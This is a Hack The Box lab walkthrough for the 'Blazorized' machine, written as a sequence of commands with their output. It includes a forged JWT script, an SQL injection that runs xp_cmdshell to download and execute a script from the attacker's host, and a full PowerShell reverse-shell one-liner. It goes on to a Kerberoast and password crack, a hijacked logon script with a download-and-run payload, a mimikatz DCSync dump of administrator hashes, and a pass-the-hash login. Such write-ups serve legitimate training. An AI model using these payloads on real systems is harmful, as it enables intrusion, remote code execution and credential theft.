HTB - Blazorized [Hard]
TCP Scan
> TARGET=10.129.81.3 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://blazorized.htb
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-06-30 21:30:03Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2022 16.00.1115.00; RC0+
| ms-sql-info:
| 10.129.81.3\BLAZORIZED:
| Instance name: BLAZORIZED
| Version:
| name: Microsoft SQL Server 2022 RC0+
| number: 16.00.1115.00
| Product: Microsoft SQL Server 2022
| Service pack level: RC0
| Post-SP patches applied: true
| TCP port: 1433
|_ Clustered: false
| ms-sql-ntlm-info:
| 10.129.81.3\BLAZORIZED:
| Target_Name: BLAZORIZED
| NetBIOS_Domain_Name: BLAZORIZED
| NetBIOS_Computer_Name: DC1
| DNS_Domain_Name: blazorized.htb
| DNS_Computer_Name: DC1.blazorized.htb
| DNS_Tree_Name: blazorized.htb
|_ Product_Version: 10.0.17763
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49700/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49710/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49776/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2022 16.00.1115.00; RC0+
| ms-sql-info:
| 10.129.81.3:49776:
| Version:
| name: Microsoft SQL Server 2022 RC0+
| number: 16.00.1115.00
| Product: Microsoft SQL Server 2022
| Service pack level: RC0
| Post-SP patches applied: true
|_ TCP port: 49776
62648/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
echo '10.129.81.3 blazorized.htb' >> /etc/hosts
enum
- subdomain
wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://blazorized.htb/" -H "Host: FUZZ.blazorized.htb" --hl 107
000000024: 200 27 L 67 W 2015 Ch "admin"
000000051: 404 0 L 0 W 0 Ch "api"
user: blazorized\nu_1055
- get
http://blazorized.htb/_framework/Blazorized.Shared.dll
- reverse to get jwt check code
- generate jwt
import jwt
import time
from datetime import datetime, timedelta
# Symmetric key from your findings
secret_key = "8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a"
# JWT claims
claims = {
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "superadmin@blazorized.htb",
"http://schemas.microsoft.com/ws/2008/06/identity/claims/role": ["Super_Admin"],
"exp": int((datetime.utcnow() + timedelta(hours=72)).timestamp()), # Set expiration time to 1 hour in the future
"iss": "http://api.blazorized.htb",
"aud": "http://admin.blazorized.htb"
}
# Encode the JWT with the symmetric key
token = jwt.encode(claims, secret_key, algorithm="HS512")
print(token)
# Print the JavaScript code
print(f"localStorage.setItem('jwt', '{token}')")
- sqli at
http://admin.blazorized.htb/check-duplicate-post-title
'; IF (SELECT CONVERT(INT, value_in_use) FROM sys.configurations WHERE name = 'xp_cmdshell') = 1 EXEC master.dbo.xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.65/rev.ps1'')" --
- reverse shell
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.65",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- listener
# rlwrap nc -vnlp 4444
PS C:\Windows\system32> whoami
blazorized\nu_1055
PS C:\users\NU_1055\desktop> type user.txt
c8d921959eabcd0ed42d61ae114e36b3
user
wget http://10.10.14.65/PowerView.ps1 -O PowerView.ps1
import-module .\PowerView.ps1
> Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
> Get-DomainSPNTicket -SPN nonexistent/BLAHBLAH
SamAccountName : UNKNOWN
DistinguishedName : UNKNOWN
ServicePrincipalName : nonexistent/BLAHBLAH
TicketByteHexStream :
Hash : $krb5tgs$23$*UNKNOWN$UNKNOWN$nonexistent/BLAHBLAH*$35549301BCB804D824B46FD05FE9A212$9FBCCA4457D7
5BB458498BF0CB0985D7C7EF648E2F3185FD139241512AC1E1BDADAA5DA3F3E73427983CDB160F724886D02D8EB121CB
76BB04F5B35130796C1C614FFFA3D53BF34A47E444CC828CA4E881E9F99A6C26000F3259DCBAA14658CCF4F82D53D89B
29574F5B651EE1056181993CBF6B730933021890870C79F0E665288EE04BF3BC85CCB1BE79FB7C9590DF4A7FE0B94CDD
36C3A5EAB62067CBD426E2B3C03D0268C14CD4BE9E897A0C73E9A4B0DD680E947064B4CD3AC45BA47371CF4433FCDE43
120C2640E2AB6745D1D6375AB8F6616B4F6AA88C4927CE37881142269FFB35DCA5976CA2FD8F9FCDCF81BBC1983149AF
0C0641BD1A3B0DF649F552DD43BFD9C8B19B20B6C0B780DC78F29613900F3BE82754DA0C9EA2F86E2A7C2D5D51E0CA4F
2D230EA3C377EE818658BA5726F67D61E014BB263FF702607FD099B9BA114D7F5B0F0DDF93B919B02A8A4A33F83564CE
4C2A4140B674DDA9553386F2DDE2C7E3024C94295CA3F30CD63E068E05E5B8EFDEA2F6B1668628FEB1A0B3A51B9DCC38
0C7A6F4CAEBF648CCEC370C99171F78B106AC58C228CDB12F59B0BFD6B640628531BC679BDCEEACCBFFC851BABBC77B7
58E79EDDFA4035C068F69177A62ED38C8843EA69A6639D0773828E8605E53BA3BAA70289646460BEA21ADE515A3455DE
4A25B0D97FD4316DE275C8B26E90B06CFFAB8DED2E7E43FBE9CD9ABF6EDE8AF5B04135BF34DA39375973061F99012D84
4203C67658C69E9C858C6669109FF9087EBEFD161D5519A708FD614517A63BEF686B7CFB27C44C62BB18D809C27C221E
51759DAAC3F28AC52AE92E04B8D4998457DF5BBDA242865B8B0DF34F4BF9A481F808623947DD3D52D3A05491C155A5B9
2B43EF411D4B47B9660E76B15803C3D29C0593FB5F7EA4C246F2AAD222292550715F0BE351314A88232FEF82248531E1
84671AA9F67D367E232925D4E8A123400B498D348CEE59778FDDEC8705D7DA59BF6F1F963048E0BB4F9558A2C7D87470
392168F249C27644C507EBF054B05EEA4B4C1F97BB280F585026B0D60142E657AB38CE2E966590CC8B1D659E67EC573F
0FD6CAD10260A4FFA2B42615A0CCC402C740FE4CCC0AD5D21EEFDAEBEC191DB602BCA490666AE58E377DBCA35927D726
A07182BE5960B6B32DB4B3B76782BF897A7D041CE8CF230B7ACF1938CD6F61AD68979A726FA0F6F190CBC909A8BF4D34
78C4219347460F2B81267A343C9C943FF66EEADB7219F8EEB0CDE4B447C6937CE1F17F2736A0D6A697E4FDA58805F9A5
2C1289DB4357E7CFA32A9750EE9018748FF0A1D01F7843B518849BC0597D73A4FF43A7C589DCAB727638AC544272516D
068E5C791BAE4E747D9DD7D9270CD77959CA3C017549D108666DE910621903931F4C64B086F7F19F4DD3E855DAFF911C
25070CBF3EBCA9F2C3080002074D6042D0AAB1739DE51BDE279DB0709833237C6D2BCC4ECB0A158543C3A081355B5119
CBACD77C56EF07DF24A208B6992163EB01AEEAB61D10AED19AA8D0DEBEF643D581CA43980D0F080E0814038F3B58D7E1
5D1DDAC5915C089640F68A350FAE2891274447535D581DFB81E82EF15D56D60C9936854A737D6E2BBEA60FCE012CBB99
1B10011DBEAFB46F1B467DB8F7A6398D403A0AA2B44B2ED42D084A0F1521DCC36242768C5E56A254B852FA9A4CEFBC56
B4583E830106AC9D52D70A0A6B1663D28028B843D2F8F84802CB9BECBE1CA4EEEABCA3435D841F95B4D2248EB7699911
39AC
- crack ticket
john hash --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
(Ni7856Do9854Ki05Ng0005 #) (?)
1g 0:00:00:06 DONE (2024-07-01 10:38) 0.1663g/s 2382Kp/s 2382Kc/s 2382KC/s (aleha)*eslomaXimo..(Cahir!!!)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
- login
> evil-winrm -i blazorized.htb -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
user:SSA_6010
- https://learn.microsoft.com/en-us/troubleshoot/windows-server/user-profiles-and-logon/assign-logon-script-profile-local-user In the above note, it explains how to set your scriptPath, it must be relative to NETLOGON path, so go find where it NETLOGON is in the system. Then check the permissions of the directories and find one where you have write privileges. Finally, paste the payload (I used a payload from revshells.com, more specifically powershell base64) in a file there (I’ve tested with an existent file and a new file ending in .bat extension, both worked, .ps1 didn’t work for some reason) and change the scriptPath of the SSA_6010 user. P.S.: Don’t try to add your payload in the original file, for some reason it doesn’t work, even when you have write permissions there…
> wget http://10.10.14.65/startup.bat -O C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\startup.bat
*Evil-WinRM* PS C:\Users\public\documents> get-aduser ssa_6010 | set-aduser -scriptpath "A32FF3AEAA23\startup.bat"
*Evil-WinRM* PS C:\Users\public\documents> get-aduser ssa_6010 -properties scriptpath
DistinguishedName : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
Enabled : True
GivenName :
Name : SSA_6010
ObjectClass : user
ObjectGUID : 8bf3166b-e716-4f91-946c-174e1fb433ed
SamAccountName : SSA_6010
ScriptPath : A32FF3AEAA23\startup.bat
SID : S-1-5-21-2039403211-964143010-2924010611-1124
Surname :
UserPrincipalName : SSA_6010@blazorized.htb
- statup.bat
powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.65/rev.ps1')
root
PS C:\users\SSA_6010\documents> Get-ObjectAcl -DistinguishedName "dc=blazorized,dc=htb" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
AceType : AccessAllowed
ObjectDN : DC=blazorized,DC=htb
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-2039403211-964143010-2924010611
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2039403211-964143010-2924010611-512
AccessMask : 917949
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : DC=blazorized,DC=htb
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2039403211-964143010-2924010611
InheritanceFlags : ContainerInherit
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2039403211-964143010-2924010611-519
AccessMask : 983551
AuditFlags : None
AceFlags : ContainerInherit
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : DC=blazorized,DC=htb
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-2039403211-964143010-2924010611
InheritanceFlags : ContainerInherit
BinaryLength : 24
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 983485
AuditFlags : None
AceFlags : ContainerInherit
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : DC=blazorized,DC=htb
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2039403211-964143010-2924010611
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-18
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
cd C:\users\SSA_6010\documents
- use mimikatz
PS C:\users\SSA_6010\documents> .\mimikatz.exe "privilege::debug" "lsadump::dcsync /user:administrator \krbtgt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz(commandline) # lsadump::dcsync /user:administrator \krbtgt
[DC] 'blazorized.htb' will be the domain
[DC] 'DC1.blazorized.htb' will be the DC server
[DC] 'administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2/25/2024 12:54:43 PM
Object Security ID : S-1-5-21-2039403211-964143010-2924010611-500
Object Relative ID : 500
Credentials:
Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
ntlm- 0: f55ed1465179ba374ec1cad05b34a5f3
ntlm- 1: eecc741ecf81836dcd6128f5c93313f2
ntlm- 2: c543bf260df887c25dd5fbacff7dcfb3
ntlm- 3: c6e7b0a59bf74718bce79c23708a24ff
ntlm- 4: fe57c7727f7c2549dd886159dff0d88a
ntlm- 5: b471c416c10615448c82a2cbb731efcb
ntlm- 6: b471c416c10615448c82a2cbb731efcb
ntlm- 7: aec132eaeee536a173e40572e8aad961
ntlm- 8: f83afb01d9b44ab9842d9c70d8d2440a
ntlm- 9: bdaffbfe64f1fc646a3353be1c2c3c99
lm - 0: ad37753b9f78b6b98ec3bb65e5995c73
lm - 1: c449777ea9b0cd7e6b96dd8c780c98f0
lm - 2: ebbe34c80ab8762fa51e04bc1cd0e426
lm - 3: 471ac07583666ccff8700529021e4c9f
lm - 4: ab4d5d93532cf6ad37a3f0247db1162f
lm - 5: ece3bdafb6211176312c1db3d723ede8
lm - 6: 1ccc6a1cd3c3e26da901a8946e79a3a5
lm - 7: 8b3c1950099a9d59693858c00f43edaf
lm - 8: a14ac624559928405ef99077ecb497ba
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 36ff197ab8f852956e4dcbbe85e38e17
* Primary:Kerberos-Newer-Keys *
Default Salt : BLAZORIZED.HTBAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 29e501350722983735f9f22ab55139442ac5298c3bf1755061f72ef5f1391e5c
aes128_hmac (4096) : df4dbea7fcf2ef56722a6741439a9f81
des_cbc_md5 (4096) : 310e2a0438583dce
OldCredentials
aes256_hmac (4096) : eeb59c1fa73f43372f40f4b0c9261f30ce68e6cf0009560f7744d8871058af2c
aes128_hmac (4096) : db4d9e0e5cd7022242f3e03642c135a6
des_cbc_md5 (4096) : 1c67ef730261a198
OlderCredentials
aes256_hmac (4096) : bb7fcd1148a3863c9122784becf13ff7b412af7d734162ed3cb050375b1a332c
aes128_hmac (4096) : 2d9925ef94916523b24e43d1cb8396ee
des_cbc_md5 (4096) : 9b01158c8923ce68
* Primary:Kerberos *
Default Salt : BLAZORIZED.HTBAdministrator
Credentials
des_cbc_md5 : 310e2a0438583dce
OldCredentials
des_cbc_md5 : 1c67ef730261a198
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 7e35fe37aac9f26cecc30390171b6dcf
02 a8710c4caaab28c0f2260e7c7bd3b262
03 81eae4cf7d9dadff2073fbf2d5c60539
04 7e35fe37aac9f26cecc30390171b6dcf
05 9bc0a87fd20d42df13180a506db93bb8
06 26d42d164b0b82e89cf335e8e489bbaa
07 d67d01da1b2beed8718bb6785a7a4d16
08 7f54f57e971bcb257fc44a3cd88bc0e3
09 b3d2ebd83e450c6b0709d11d2d8f6aa8
10 1957f9211e71d307b388d850bdb4223f
11 2fa495bdf9572e0d1ebb98bb6e268b01
12 7f54f57e971bcb257fc44a3cd88bc0e3
13 de0bba1f8bb5b81e634fbaa101dd8094
14 2d34f278e9d98e355b54bbd83c585cb5
15 06b7844e04f68620506ca4d88e51705d
16 97f5ceadabcfdfcc019dc6159f38f59e
17 ed981c950601faada0a7ce1d659eba95
18 cc3d2783c1321d9d2d9b9b7170784283
19 0926e682c1f46c007ba7072444a400d7
20 1c3cec6d41ec4ced43bbb8177ad6e272
21 30dcd2ebb2eda8ae4bb2344a732b88f9
22 b86556a7e9baffb7faad9a153d1943c2
23 c6e4401e50b8b15841988e4314fbcda2
24 d64d0323ce75a4f3dcf0b77197009396
25 4274d190e7bc915d4047d1a63776bc6c
26 a04215f3ea1d2839a3cdca4ae01e2703
27 fff4b2817f8298f09fd45c3be4568ab1
28 2ea3a6b979470233687bd913a8234fc7
29 73d831d131d5e67459a3949ec0733723
mimikatz(commandline) # exit
Bye!
- login
┌──(root㉿kali)-[~/workspace/Blazorized]
└─# evil-winrm -i blazorized.htb -u administrator -H f55ed1465179ba374ec1cad05b34a5f3
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> ls
Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/29/2024 3:42 PM 159 note.txt
-ar--- 6/30/2024 7:33 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
996613cb46967be90e154649068d4465
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack